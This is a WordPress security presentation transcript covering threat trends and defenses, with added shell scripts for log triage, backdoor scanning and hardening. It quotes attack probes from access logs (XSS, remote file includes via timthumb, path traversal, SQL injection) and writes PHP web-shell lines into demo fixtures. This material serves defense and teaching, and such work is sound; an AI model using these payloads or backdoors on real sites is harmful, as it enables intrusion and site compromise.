Website Security - Latest and Greatest (WordPress 2014)

This presentation focuses on three elements: Trends, Threats and Defenses. It leverages the latest data from some of the top information security companies (e.g., Symantec, Websense). It does not go over the typical "10 things"; instead it focuses on broad information security concepts and principles that many website owners don't account for.

1. Website Security (WordPress)
2. Sucuri, Inc. | @sucuri_security | @perezbox
   Specialization: Website Security, Incident Handling
   Special Interests: Brazilian Jiu-Jitsu
   Tony Perez | @perezbox | @sucuri_security | 5/17/2014
3. Website Security Company
   Global Operations
   Platform Agnostic (i.e., Joomla, WordPress, etc.)
   Scan 2M Unique Domains a Month
   Block 4M web attacks a Month
   Remediate 400 - 500 websites a day
   Signature / Heuristic Based
   24/7 operations
4. Trends, Threats, Defenses
5. (image only)
6. Data Breaches (Millions): 2011 vs. 2013 (chart)
7. Malicious Websites vs. Legitimate Websites (chart)
8. Not-Exploitable vs. Exploitable (chart); 1 in 8 - Critical Vulnerability
9. Ransomware: 2012 vs. 2013 (chart)
10. Infection types (chart): Remote iFrame Includes, Remote JavaScript Includes, SPAM Injections, Obfuscated / Encoded JavaScript, Conditional Redirects, Defacements, Other. Values shown: 26%, 19%, 16%, 14%, 11%, 4%, 10%.
11-12. (image only)
13. Going deeper than the application layer, targeting the server: Darkleech, Cdork (Apache), Ebury (SSH), Email Server (SPAM), Heartbleed (OpenSSL)
    Server polymorphism, a.k.a. highly adaptive / sophisticated
14. (image only)
15. SEO spam: Pharmacy, Payday Loans
16. Exploiting Access Control
17. Cross-Site Contamination: Site 1, Site 2, Site 3, Site 4 (diagram)
18-25. (image only)
26. Explosion in the Malware as a Service (MaaS) trade
    Yes, pay someone to hack for you
    Different tools to break in and generate payloads
    Brute force and vulnerability exploits
    Malware Payloads
    Blackhole Exploit Author Arrested
27. Exploit kits (chart): Neutrino, Unknown Kit, Redkit, SweetOrange, Styx, Glazunov/Sibhost, Nuclear, Blackhole/Cool, Other. Values shown: 25%, 22%, 9%, 1%, 11%, 5%, 12%, 10%, 5%.
28-29. (image only)
30. What kind of website do you have? Use for malware? Burrow into network? Steal data?
31. (image only)
32. Cross-site scripting (XSS) probes in the access log - Stored, Reflective:
    38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
    123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268
33. (image only)
34. File inclusion probes: remote includes through timthumb-style src= parameters, and a path-traversal local include aimed at /proc/self/environ:
    [02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
    83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&sa=U&ei=vGBcUYS1IcOaiQLxu4HIBg&ved=0CCYQFjAE&usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
    82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
35. SQL injection probe (UNION SELECT):
    62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9"
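The log entries on slides 32 to 35 are what a site owner finds after the fact, and the second XSS entry shows why a detector that only looks for a literal `<script>` misses real traffic: the whole payload arrives percent-encoded. As an added example, not code from the slides or from Sucuri, the following POSIX shell script classifies combined-format access-log lines into the four families shown (XSS, remote include via a timthumb-style src= parameter, path traversal / local include, SQL injection). The function names, the patterns and the sample log (RFC 5737 addresses, modelled on the slides' entries) are all my own construction.

```shell
#!/bin/sh
# Added example (not from the slides or Sucuri): classify Apache combined-format
# access-log entries into the attack families shown on slides 32-35.
# Patterns are deliberately simple and match both raw and percent-encoded forms;
# they are a triage aid, not a substitute for a WAF.

# classify_request REQUEST_LINE -> prints xss | rfi | lfi | sqli | clean
# First matching family wins, so a request carrying several payloads is
# reported once.
classify_request() {
  req=$1
  if printf '%s\n' "$req" | grep -Eiq '(<|%3C)(/|%2F)?script|onerror(=|%3D)|alert(\(|%28)'; then
    echo xss
  elif printf '%s\n' "$req" | grep -Eiq '[a-z_]*thumb\.php\?.*src=https?(:|%3A)'; then
    echo rfi   # timthumb-style remote include: src= pointing at another host
  elif printf '%s\n' "$req" | grep -Eiq '(\.\./|%2e%2e(/|%2f))|/proc/self/environ'; then
    echo lfi   # path traversal, often aimed at /proc/self/environ
  elif printf '%s\n' "$req" | grep -Eiq 'union(\+|%20| )+(all(\+|%20| )+)?select'; then
    echo sqli
  else
    echo clean
  fi
}

# classify_log_line LOG_LINE -> same labels; pulls the quoted request out of
# a combined/common-format entry (the second double-quoted field).
classify_log_line() {
  req=$(printf '%s\n' "$1" | awk -F'"' '{print $2}')
  classify_request "$req"
}

# scan_log FILE -> one line per suspicious entry: "<label> <client ip> <request>"
scan_log() {
  while IFS= read -r line; do
    label=$(classify_log_line "$line")
    if [ "$label" != clean ]; then
      ip=${line%% *}
      req=$(printf '%s\n' "$line" | awk -F'"' '{print $2}')
      printf '%s %s %s\n' "$label" "$ip" "$req"
    fi
  done < "$1"
}

# Constructed sample log (modelled on the slides' entries, RFC 5737 addresses).
sample_log=$(mktemp)
cat > "$sample_log" <<'EOF'
192.0.2.10 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0"
192.0.2.11 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268 "-" "Mozilla/5.0"
192.0.2.12 - - [02/Apr/2013:00:32:58 -0400] "GET /wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fexample.net%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0"
192.0.2.13 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0"
192.0.2.14 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0"
192.0.2.15 - - [03/Apr/2013:05:25:00 -0400] "GET /wp-content/uploads/2013/04/photo.jpg HTTP/1.1" 200 51200 "-" "Mozilla/5.0"
EOF

scan_log "$sample_log"
rm -f "$sample_log"
```

Run it against a real log with `scan_log /var/log/apache2/access.log`. Expect some false positives on legitimate URLs that happen to contain `../` or the word `select`; the point is to surface the probes shown on the slides quickly, not to block anything.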
36-37. (image only)
38. Free copies of "premium" plugins carrying a payload - http://blog.sucuri.net/2014/03/unmasking-free-premium-wordpress-plugins.html
    SEOPressor - payload located: wp-content/plugins/seo-pressor(gratuit), file: central.class.php
    Flat Skins Pack Extension - payload located: wp-content/ubermenu-skins-flat
    Restrict Content Pro - payload located: wp-content/restrict-content-pro/includes/, file: sidebar.php
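Slide 38 is about code you chose to install, so the check belongs before activation, not after the blacklist warning. As an added example, not from the slides or the linked Sucuri post, the script below sweeps a WordPress tree for two things: PHP-executable files under wp-content/uploads, where only media should live, and PHP files under wp-content that evaluate decoded or request-supplied strings or embed a long base64 blob, the idioms bundled backdoors most often rely on. The function name, the regular expression and the demo tree are my own construction; the indicators are generic and say nothing about the three specific plugins named on the slide.

```shell
#!/bin/sh
# Added example (not from the slides or the Sucuri blog post): a quick sweep for
# constructs typical of payloads bundled into "free premium" plugins. Matches are
# leads for manual review, not proof of compromise.

# find_suspicious_php WP_ROOT -> sorted, de-duplicated list of file paths
find_suspicious_php() {
  root=$1
  {
    # (a) executable extensions in the uploads tree
    find "$root/wp-content/uploads" -type f \
      \( -name '*.php' -o -name '*.php[0-9]' -o -name '*.phtml' -o -name '*.phar' \) 2>/dev/null
    # (b) obfuscation / web-shell idioms anywhere under wp-content:
    #     eval() of a decoded or request-supplied string, a shell function fed
    #     straight from the request, or a base64 blob of 200+ characters
    find "$root/wp-content" -type f -name '*.php' 2>/dev/null | while IFS= read -r f; do
      if grep -Eq \
        'eval[[:space:]]*\([[:space:]]*(base64_decode|gzinflate|gzuncompress|str_rot13|\$_(GET|POST|REQUEST|COOKIE))|(system|passthru|shell_exec|assert)[[:space:]]*\([[:space:]]*\$_(GET|POST|REQUEST|COOKIE)|[A-Za-z0-9+/=]{200,}' \
        "$f"; then
        printf '%s\n' "$f"
      fi
    done
  } | sort -u
}

# Constructed demo tree: one clean plugin file, one "premium" plugin whose
# sidebar include hides a backdoor, and a PHP file dropped into uploads.
demo=$(mktemp -d)
mkdir -p "$demo/wp-content/plugins/good" "$demo/wp-content/plugins/nulled-pro/includes" "$demo/wp-content/uploads/2014/03"
printf '<?php\nadd_action("init", function () { return 1; });\n' > "$demo/wp-content/plugins/good/good.php"
printf '<?php\n/* looks harmless */\neval(base64_decode($_POST["c"]));\n' > "$demo/wp-content/plugins/nulled-pro/includes/sidebar.php"
printf '<?php system($_GET["cmd"]);\n' > "$demo/wp-content/uploads/2014/03/image.php"

find_suspicious_php "$demo"
rm -rf "$demo"
```

Run `find_suspicious_php /var/www/html` on a fresh download before activating it and again on a schedule; a hit in a plugin you just paid nothing for is the cue to diff it against the vendor's release rather than to trust it.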
39. Brand Reputation; Legal Implications; Impact to Sales; Blacklisted by Search Engines; Blacklisted by Payment Processors; Worst Day of Your Life
40. (image only)
41. Sucuri properties suffer: ~125,000 web-based attacks a month on average; ~4,000 attacks a day (this spikes on occasion); doesn't include server-level attacks; all flavors of attacks
42. Principles; Access Control; Vulnerabilities
43. "It's about risk reduction... risk will never be zero..."
44. Defense in depth: "...a concept in which multiple layers of security controls (defenses) are placed throughout an information technology (IT) system. Its intent is to provide redundancy in the event a security control fails or a vulnerability is exploited..."
45. Passwords: Complex - Long - Unique
46-47. (image only)
48. https://getclef.com/ | @getclef
49. Least privilege: "requires that in a particular abstraction layer of a computing environment, every module (such as a process, a user or a program depending on the subject) must be able to access only the information and resources that are necessary for its legitimate purpose."
50. PHP Execution, disable it in: /wp-includes, /wp-content, /themes, /plugins, /uploads
    .htaccess:
    # Apache 2.2 syntax; Apache 2.4 (mod_authz_core) uses "Require all denied" instead
    <Files *.php>
    Deny from all
    </Files>
51. wp-config.php modification - disable the plugin / theme editor:
    define('DISALLOW_FILE_EDIT', true);
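Slides 50 and 51 give the two snippets but not the operational details that decide whether they work. As an added example, not code from the slides, the script below applies both: deny_php_in writes an .htaccess that carries the Apache 2.2 syntax shown on the slide and the Apache 2.4 "Require all denied" form, because 2.4 ignores the old directives unless mod_access_compat is loaded; set_wp_constant inserts a define() above the "stop editing" marker, since a constant defined after wp-settings.php is loaded has no effect. The function names, the FilesMatch extension list and the demo wp-config.php are my own assumptions. One caveat the slide does not spell out: a blanket deny in wp-includes or wp-content can break plugins and themes that are requested directly (the visual editor's wp-tinymce.php in older releases, for instance); uploads is the one directory where it is always safe, so harden_wp applies it there by default and takes further directories as arguments. Test the site after applying.

```shell
#!/bin/sh
# Added example (not from the slides): disable PHP execution per directory and
# set wp-config.php constants safely. Function names are my own.

# deny_php_in DIR -> writes DIR/.htaccess blocking direct execution of PHP
deny_php_in() {
  dir=$1
  mkdir -p "$dir"
  cat > "$dir/.htaccess" <<'EOF'
# Deny direct execution of PHP (and the alternate extensions PHP may handle).
<FilesMatch "\.(php|php[0-9]|phtml|phar)$">
  <IfModule mod_authz_core.c>
    Require all denied
  </IfModule>
  <IfModule !mod_authz_core.c>
    Order deny,allow
    Deny from all
  </IfModule>
</FilesMatch>
EOF
}

# set_wp_constant WP_CONFIG NAME VALUE -> defines NAME if it is not already defined,
# inserting above the "stop editing" marker (or the wp-settings.php require),
# never after it. Refuses to touch a file that has neither marker.
set_wp_constant() {
  cfg=$1 name=$2 value=$3
  if grep -Eq "define[[:space:]]*\([[:space:]]*['\"]$name['\"]" "$cfg"; then
    printf '%s already defined in %s, leaving it\n' "$name" "$cfg" >&2
    return 0
  fi
  awk -v line="define('$name', $value);" '
    !done && (/stop editing/ || /wp-settings\.php/) { print line; done = 1 }
    { print }
    END { if (!done) exit 1 }
  ' "$cfg" > "$cfg.tmp" && mv "$cfg.tmp" "$cfg" || { rm -f "$cfg.tmp"; return 1; }
}

# harden_wp WP_ROOT [EXTRA_DIR...] -> uploads always; pass wp-includes etc. if
# you have verified the site still works with them locked down.
harden_wp() {
  root=$1; shift
  for d in wp-content/uploads "$@"; do
    deny_php_in "$root/$d"
  done
  set_wp_constant "$root/wp-config.php" DISALLOW_FILE_EDIT true
  # Also stop the dashboard installing or updating code (slide 59's "don't let
  # WordPress write to itself"); updates then happen out of band (deploys, WP-CLI).
  set_wp_constant "$root/wp-config.php" DISALLOW_FILE_MODS true
}

# Constructed demo install: a minimal wp-config.php with the standard marker.
demo=$(mktemp -d)
cat > "$demo/wp-config.php" <<'EOF'
<?php
define('DB_NAME', 'wp');
/* That's all, stop editing! Happy blogging. */
require_once ABSPATH . 'wp-settings.php';
EOF
harden_wp "$demo"
cat "$demo/wp-config.php"
rm -rf "$demo"
```

DISALLOW_FILE_MODS is the stronger of the two constants: it implies DISALLOW_FILE_EDIT and also removes the install and update buttons, so only use it where patching is handled by a deploy process you actually run, otherwise it turns "don't let WordPress write to itself" into "never patch".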
52. https://www.getcloak.com/ | @getcloak
53. (image only)
54. NOT THAT HARD!!!!
55. Stay current with the latest vulnerabilities: Secure - http://wordpress.org/plugins/secure/
56. Local Protection: https://bruteprotect.com/ | @BruteProtect
57. Stay ahead of Software Vulnerabilities
58. (image only)
59. The Bare Minimum:
    1. Connect Securely - SFTP / SSH
    2. Authentication Keys / wp-config
    3. Use Trusted Sources
    4. Use a local Antivirus - Mac too
    5. Permissions - D 755 | F 644
    6. Least Privilege Principles
    7. Accountability
    8. Backups - Include Database
    Ideal implementations:
    1. Employ Website Firewall
    2. Don't let WordPress write to itself
    3. Filter Access by IP
    4. Use a dedicated server / VPS
    5. Monitor all Activity (Logging)
    6. Enable SSL for transactions
    7. Keep environment current (patched)
    8. No Soup Kitchen Servers
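Two items on slide 59, "Permissions - D 755 | F 644" and "Don't let WordPress write to itself", are usually applied once with a chmod and never checked again. As an added example, not code from the slides, the script below turns them into repeatable checks: fix_wp_permissions applies the slide's baseline and tightens wp-config.php (it holds the database credentials), audit_wp_permissions counts deviations from that baseline including anything world-writable, and files_owned_by lists what a given account owns outside uploads. If the account PHP runs as owns most of the tree, a bug in any plugin lets PHP rewrite the site, which is how injected index.php files and rogue plugins land; the target is a deploy user that owns the code and a web-server user that can only write to uploads. Function names and the demo tree are my own construction.

```shell
#!/bin/sh
# Added example (not from the slides): permissions and ownership checks for a
# WordPress tree. Function names are my own.

# fix_wp_permissions WP_ROOT -> directories 755, files 644, wp-config.php 600
fix_wp_permissions() {
  root=$1
  find "$root" -type d -exec chmod 755 {} +
  find "$root" -type f -exec chmod 644 {} +
  # Credentials: owner-only read (use 640 if the web server runs as the owner's group).
  [ -f "$root/wp-config.php" ] && chmod 600 "$root/wp-config.php"
  return 0
}

# audit_wp_permissions WP_ROOT -> prints the number of deviating entries (0 is clean)
audit_wp_permissions() {
  root=$1
  {
    find "$root" -type d ! -perm 755
    find "$root" -type f ! -name wp-config.php ! -perm 644
    find "$root" -type f -name wp-config.php ! -perm 600 ! -perm 640
    find "$root" -perm -002          # anything world-writable, whatever else it is
  } | sort -u | wc -l | tr -d ' '
}

# files_owned_by WP_ROOT USER -> paths owned by USER (e.g. www-data), one per
# line, ignoring the uploads tree where the web server is expected to write.
files_owned_by() {
  root=$1 user=$2
  id "$user" >/dev/null 2>&1 || { printf 'no such user: %s\n' "$user" >&2; return 2; }
  find "$root" -user "$user" ! -path "$root/wp-content/uploads/*"
}

# Constructed demo tree with a sloppy layout: world-writable plugin dir and file.
demo=$(mktemp -d)
mkdir -p "$demo/wp-content/plugins/foo" "$demo/wp-content/uploads"
printf '<?php\n' > "$demo/wp-content/plugins/foo/foo.php"
printf '<?php define("DB_PASSWORD", "secret");\n' > "$demo/wp-config.php"
chmod 777 "$demo/wp-content/plugins/foo" "$demo/wp-content/plugins/foo/foo.php"
printf 'deviations before: %s\n' "$(audit_wp_permissions "$demo")"
fix_wp_permissions "$demo"
printf 'deviations after:  %s\n' "$(audit_wp_permissions "$demo")"
# Everything here is owned by the current user, so this lists the whole tree:
# exactly the picture you do not want for the account PHP runs as.
files_owned_by "$demo" "$(id -un)" | wc -l
rm -rf "$demo"
```

Run `files_owned_by /var/www/html www-data` (or whatever your PHP worker runs as) on a real install; a long list there means WordPress can write to itself regardless of what wp-config.php says, and the fix is chown to a separate deploy user, not another chmod.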
60. (what not to do)
    1. Fix index.php file and assume all is fine.
    2. Panic your way into WordPress Forums after hack.
    3. Don't worry about updating.
    4. Trust third-party extensions.
    5. Apply all upgrades on live site.
    6. Install and forget, all is well with your new site.
    7. Use the same username and password for everything.
    8. Don't waste time making security adjustments to PHP and settings.
    9. No regular backups required.
    10. Use the cheapest host.
61. Resources (Name - Tool):
    Sucuri Blog - http://blog.sucuri.net
    SucuriTV - http://sucuri.tv
    Malware Scanner - http://sitecheck.sucuri.net
    Malware Scanner - http://unmaskparasites.com
    Badware Busters - https://badwarebusters.org
    Google Forums - http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sites
    Google Webmaster Tools - http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633
    Secunia Security Advisories - http://secunia.com/community/advisories/search/?search=wordpress
    Exploit-DB - http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31
    WordPress Hacked FAQ - http://codex.wordpress.org/FAQ_My_site_was_hacked
    WordPress Hardening - http://codex.wordpress.org/Hardening_WordPress
62. Sucuri, Inc. - Tony Perez - http://sucuri.net - http://blog.sucuri.net - @perezbox | @sucuri_security
    Slides: http://www.slideshare.net/perezbox/website-security-its-about-the-basics-wordpress-2014